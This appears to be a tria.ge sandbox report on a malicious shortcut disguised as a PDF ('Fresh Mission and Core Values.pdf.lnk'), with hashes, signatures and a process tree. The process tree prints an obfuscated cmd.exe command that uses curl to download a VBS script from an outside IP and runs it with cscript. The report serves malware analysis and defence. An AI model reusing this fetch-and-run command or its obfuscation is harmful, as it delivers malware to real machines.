Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
131s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
12/10/2023, 04:27
Static task
static1
Behavioral task
behavioral1
Sample
Fresh Mission and Core Values.pdf.lnk
Resource
win7-20230831-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
Fresh Mission and Core Values.pdf.lnk
Resource
win10v2004-20230915-en
6 signatures
150 seconds
General
-
Target
Fresh Mission and Core Values.pdf.lnk
-
Size
2KB
-
MD5
cea0885964c5c18fd7410ca82e0da52e
-
SHA1
272151f1e4f39fd79457dc3f1538103f153c5bf8
-
SHA256
e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e
-
SHA512
3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 812 PING.EXE 3032 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1408 wrote to memory of 2596 1408 cmd.exe 29 PID 1408 wrote to memory of 2596 1408 cmd.exe 29 PID 1408 wrote to memory of 2596 1408 cmd.exe 29 PID 2596 wrote to memory of 812 2596 cmd.exe 30 PID 2596 wrote to memory of 812 2596 cmd.exe 30 PID 2596 wrote to memory of 812 2596 cmd.exe 30 PID 2596 wrote to memory of 3032 2596 cmd.exe 31 PID 2596 wrote to memory of 3032 2596 cmd.exe 31 PID 2596 wrote to memory of 3032 2596 cmd.exe 31 PID 2596 wrote to memory of 2612 2596 cmd.exe 32 PID 2596 wrote to memory of 2612 2596 cmd.exe 32 PID 2596 wrote to memory of 2612 2596 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\PING.EXEp"in"G kdYh3⤵
- Runs ping.exe
PID:812
-
-
C:\Windows\system32\PING.EXEp"in"G -n 3 kdYh3⤵
- Runs ping.exe
PID:3032
-
-
C:\Windows\system32\cscript.exeC"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs3⤵PID:2612
-
-